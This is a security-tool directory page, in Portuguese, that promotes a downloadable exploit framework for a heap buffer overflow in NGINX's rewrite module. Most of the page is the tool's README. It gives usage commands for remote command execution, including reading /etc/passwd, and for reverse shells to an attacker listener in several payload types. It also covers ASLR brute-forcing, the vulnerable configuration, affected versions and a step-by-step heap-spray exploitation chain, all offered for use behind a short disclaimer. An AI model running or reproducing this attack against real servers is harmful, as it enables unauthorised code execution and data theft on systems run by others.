Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42945 — Foi encontrada uma falha no NGINX, especificamente dentro do ngx_http_rewrite_module. Um atacante não autenticado pode explorar esta vulnerabilidade enviando solicitações HTTP especialmente criadas sob configurações de reescrita específicas. Isso pode levar a um estouro de buffer no heap no processo worker do NGINX, o que pode resultar na execução de código arbitrário. | Kitploit
Ferramentas/GitHubGitHub/aratane/cve-2026-42945
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de Binários

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubaratane/cve-2026-42945

CVE-2026-42945

Ver Repositório
13há 2 mesesAinda não revisado

Sobre

Foi encontrada uma falha no NGINX, especificamente dentro do ngx_http_rewrite_module. Um atacante não autenticado pode explorar esta vulnerabilidade enviando solicitações HTTP especialmente criadas sob configurações de reescrita específicas. Isso pode levar a um estouro de buffer no heap no processo worker do NGINX, o que pode resultar na execução de código arbitrário.

Compartilhar

RIFT — Injeção Remota & Disparo de Falhas

Autor: Michael Sanji Winaya Prawiradibrata
Coautor de IA: Varanus — meu amigo

Estrutura de exploit de heap buffer overflow direcionada ao ngx_http_rewrite_module do NGINX.
Uma ferramenta para reconhecimento + exploração. Zero dependências externas.


Conteúdo do Repositório

ArquivoDescrição
rift.pyFerramenta principal. Combina recon + exploit em um único script (1026 linhas).
README.mdEsta documentação.

Requisitos

  • Python 3.6+ (apenas stdlib — sem pip, sem venv, sem dependências)

Início Rápido

root@kitploit:~
# 1. Full reconnaissance — deteksi versi, endpoint, celah, strategi
python3 rift.py --target 10.10.10.10 --recon

# 2. Recon + exploit sekali jalan
python3 rift.py --target 10.10.10.10 --auto --cmd "id"

# 3. Command execution
python3 rift.py --target 10.10.10.10 --cmd "whoami"

# 4. Reverse shell (auto-open listener)
python3 rift.py --target 10.10.10.10 --shell --lhost 10.10.14.5 --lport 4444

# 5. Reverse shell pakai bash (instead of python)
python3 rift.py --target 10.10.10.10 --shell --shell-type bash --lhost 10.10.14.5 --lport 4444

# 6. Cek vulnerable saja
python3 rift.py --target 10.10.10.10 --check-only

Todas as Flags

Modo de Uso

Opções de Exploit

Opções de Recon


Recursos Principais

✅ Reverse Shell Automático

Ao usar --shell, o script automaticamente:

  1. Gera o payload de reverse shell conforme --shell-type
  2. Abre o listener em --lport
  3. Envia o exploit
  4. Assim que o worker crash → a shell entra
  5. Listener automático: Prioriza netcat (nc -lvnp), fallback para listener Python

✅ Força Bruta Automática de ASLR

Se o endereço padrão falhar, o script desloca automaticamente a heap base em ±5 passos × 0x10000, procurando um endereço compatível. Não é necessário configuração manual.

✅ Reverse Shell Multi-Payload

4 tipos de payload de shell — python, bash, nc, php. Escolha o que estiver disponível no alvo.

✅ Reconhecimento Completo

--recon executa 5 fases:

  1. Fingerprint — detecta versão do NGINX, 15 endpoints comuns, módulo rewrite
  2. Vazamento de informações — endereço de memória na página de erro, canal lateral de timing
  3. Teste de endpoint — comportamento do endpoint com 6 tipos de payload
  4. Contagem de workers — estima o número de processos worker a partir do padrão de latência
  5. Estratégia — recomenda ações com base nos resultados da análise

✅ Saída JSON

--output json para integração com outras ferramentas ou parsing automático.


Configuração Vulnerável

O alvo do exploit é NGINX com configuração rewrite + set assim:

root@kitploit:~
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # is_args = 1
    set $original_endpoint $1;                     # length calc pake is_args = 0
}

Consequência: o buffer alocado é pequeno demais, o escaping de URI (expansão de 3×) causa overflow.

Versões Afetadas

  • NGINX Open Source: 0.6.27 – 1.30.0
  • NGINX Plus: R32 – R36
  • Corrigido: 1.31.0, 1.30.1, R36 P4+, R35 P2+, R32 P6+

Como Funciona o Exploit

root@kitploit:~
1. HEAP SPRAY ─── POST /spray × 20 → tanam fake ngx_pool_cleanup_s di heap
2. TRIGGER ────── GET /api/AAAA...++++... → overflow via URI escaping
3. CORRUPT ────── Overflow tulis ulang cleanup pointer pool adjacent
4. EXEC ───────── Pool destroyed → panggil system("command")

Constantes Importantes (podem ser alteradas em rift.py)


Exemplos Completos

Execução de Comando + Verbose

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "cat /etc/passwd" --verbose

Endereço Personalizado (bypass de ASLR)

root@kitploit:~
python3 rift.py --target 10.10.10.10 \
    --cmd "id" \
    --heap-base 0x555555659000 \
    --libc-base 0x7ffff77ba000

Muitas Tentativas

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "id" --tries 50

Recon + JSON

root@kitploit:~
python3 rift.py --target 10.10.10.10 --recon --output json

Gerar Script de Exploit

root@kitploit:~
python3 rift.py --target 10.10.10.10 --generate-exploit
# → exploit_10_10_10_10.py

Solução de Problemas

"O alvo não parece estar rodando NGINX"

  • Verifique a porta: nc -zv <IP> 80
  • Tente outra porta: --port 8080, --port 443
  • Pode estar atrás de WAF/proxy

"Todas as tentativas de exploit falharam"

  1. O ASLR pode estar ativo — tente --auto para o deslizamento automático de ASLR
  2. A versão do NGINX pode já estar corrigida (> 1.30.1)
  3. A configuração do NGINX pode não ser vulnerável (não usa rewrite+set)
  4. Tente --verbose para ver detalhes por tentativa

A shell não conecta

  • Verifique o firewall local: sudo ufw allow 4444
  • Verifique --lhost — certifique-se de que o IP local está correto
  • Tente --shell-type bash ou --shell-type nc

Aviso Legal

Feito apenas para fins educacionais e testes de segurança autorizados.
O uso em sistemas sem autorização é ilegal.

© 2026 Michael Sanji Winaya Prawiradibrata
Coautor de IA: Varanus

Baixar ferramenta
FlagFunção
--reconReconhecimento completo. Fingerprint → vazamento de informações → teste de endpoint → contagem de workers → estratégia.
--autoRecon + exploit automático. Igual a --recon e depois segue para o exploit.
--check-onlyVerificação rápida. Detecta NGINX, versão, endpoint /api/.
--cmd "command"Executa um único comando via system().
--shellReverse shell — abre o listener automaticamente, envia o payload, recebe a conexão.
FlagPadrãoFunção
--port80Porta do alvo
--lhost—IP local para reverse shell (obrigatório se usar --shell)
--lport4444Porta local para o listener
--shell-typepythonPayload de reverse shell: python, bash, nc, php
--heap-base0x555555659000Endereço base da heap (override para bypass de ASLR)
--libc-base0x7ffff77ba000Endereço base da libc
--tries10Tentativas por endereço candidato
--verbose / -v—Saída detalhada por tentativa
FlagFunção
--fingerprintDetecta versão do NGINX, endpoint, módulo rewrite
--leakVerifica vazamento de informações (endereço de memória na página de erro, timing)
--test-endpointTesta o comportamento do endpoint com vários payloads
--endpointCaminho do endpoint para teste (padrão: /api/)
--generate-exploitGera script de exploit específico com o endereço do alvo
--output jsonSaída JSON (legível por máquina) junto com a saída do terminal
ConstantePadrãoSignificado
BODY_LEN4000Tamanho do corpo do spray (bytes)
N_SPRAY20Número de requisições POST por tentativa
LIBC_SYSTEM_OFFSETS7 entradasOffsets de system() para várias distros
PREREAD_HEAP_OFFSETS19 entradasCandidatos a offset de heap
DEFAULT_HEAP_BASE0x555555659000Heap base (ASLR desativado)
DEFAULT_LIBC_BASE0x7ffff77ba000Libc base (ASLR desativado)